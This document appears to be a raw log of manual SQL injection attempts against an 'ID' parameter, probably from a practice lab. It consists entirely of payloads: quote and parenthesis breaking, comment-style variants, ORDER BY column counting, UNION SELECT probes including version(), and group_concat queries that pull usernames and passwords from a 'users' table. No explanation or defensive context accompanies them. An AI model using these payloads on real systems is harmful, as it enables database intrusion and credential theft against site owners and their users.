ID:2
ID:2'
ID:2' -- 
ID:2' -- -
ID:2' --
ID:2' --#
ID:2' -- -
ID:2' order by 22
ID:2' order by 1
ID:2' order by 4
ID:2' order by 3
ID:2' order by 3--
ID:2' order by 3-- 
ID:2' order by 3-- -
ID:2' order by 3--
ID:2' union select 1,2,3--
ID:2' union select 1,2,3--#
ID:-2' union select 1,2,3--#
ID:-2' union select 1,2,3-- 
ID:-2' union select 1,2,3-- -
ID:null' union select 1,2,3-- -
ID:null' union select 1,2,3-- 
ID:null' union select 1,2,3--
ID:null union select 1,2,3--
ID:null union select 1,version(),3--
ID:1
ID:1'
ID:1')
ID:1') --
ID:1') -- 
ID:null') -- 
ID:-1') -- 
ID:1') -- 
ID:1') order by 4-- 
ID:1') order by 4-- 
ID:1') order by 2-- 
ID:1') order by 3-- 
ID:1') union select 1,2,3-- 
ID:-1') union select 1,2,3-- 
ID:-1') union select 1,3-- 
ID:-1') union select 1,2,3-- 
ID:-1') union select 1,username,password from users-- 
ID:-1') union select 1,username,password from users limit 1,1-- 
ID:-1') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:2') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:333') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:nul') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:-515') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:-515') union select 1,group_concat(username,0x3a3a,password,'<br>'),3 from users-- 
ID:5\
ID:5\
